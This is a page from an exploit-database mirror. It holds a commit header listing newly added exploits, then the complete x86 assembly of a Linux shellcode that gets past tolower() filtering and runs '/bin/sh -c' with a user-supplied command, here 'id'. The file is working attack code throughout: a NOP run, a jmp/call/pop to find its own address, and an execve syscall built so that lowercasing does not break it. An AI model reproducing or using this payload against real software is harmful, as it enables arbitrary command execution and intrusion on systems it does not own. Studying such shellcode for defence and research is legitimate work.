exploit-db-mirror/shellcodes/linux_x86/47240.S
Offensive Security 998fb1eeec DB: 2019-08-14
6 changes to exploits/shellcodes

Steam Windows Client - Local Privilege Escalation
Agent Tesla Botnet - Arbitrary Code Execution
AZORult Botnet - SQL Injection

Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)
Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode
Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break­ Chroot Jail + Backdoor) + Signature Evasion Shellcode
2019-08-14 05:02:24 +00:00

67 lines
No EOL
1.3 KiB
ArmAsm

# tolower() execve() /bin/sh -c (user supplied command)
# shellcode to evade tolower() and friends, requires %esi
# to reference a valid writeable address (usually does)
.text
.global _start
_start:
jmp data
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
start:
popl %edi
movl %edi, %ecx
xorl %eax,%eax
movl %eax,%es:(%esi)
pushl %es:(%esi)
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
movl %eax,%es:(%esi)
pushl %es:(%esi)
pushw $0x632d
movl %esp,%edi
movl %eax,%es:(%esi)
pushl %es:(%esi)
movl %ecx,%eax
movl %eax,%es:(%esi)
pushl %es:(%esi)
movl %edi,%eax
movl %eax,%es:(%esi)
pushl %es:(%esi)
movl %ebx,%eax
movl %eax,%es:(%esi)
pushl %es:(%esi)
movl %esp,%esi
movl %esi,%ecx
xorl %eax, %eax
movb $0x08, %al
addb $0x03, %al
int $0x80
data:
call start
#command
.ascii "id"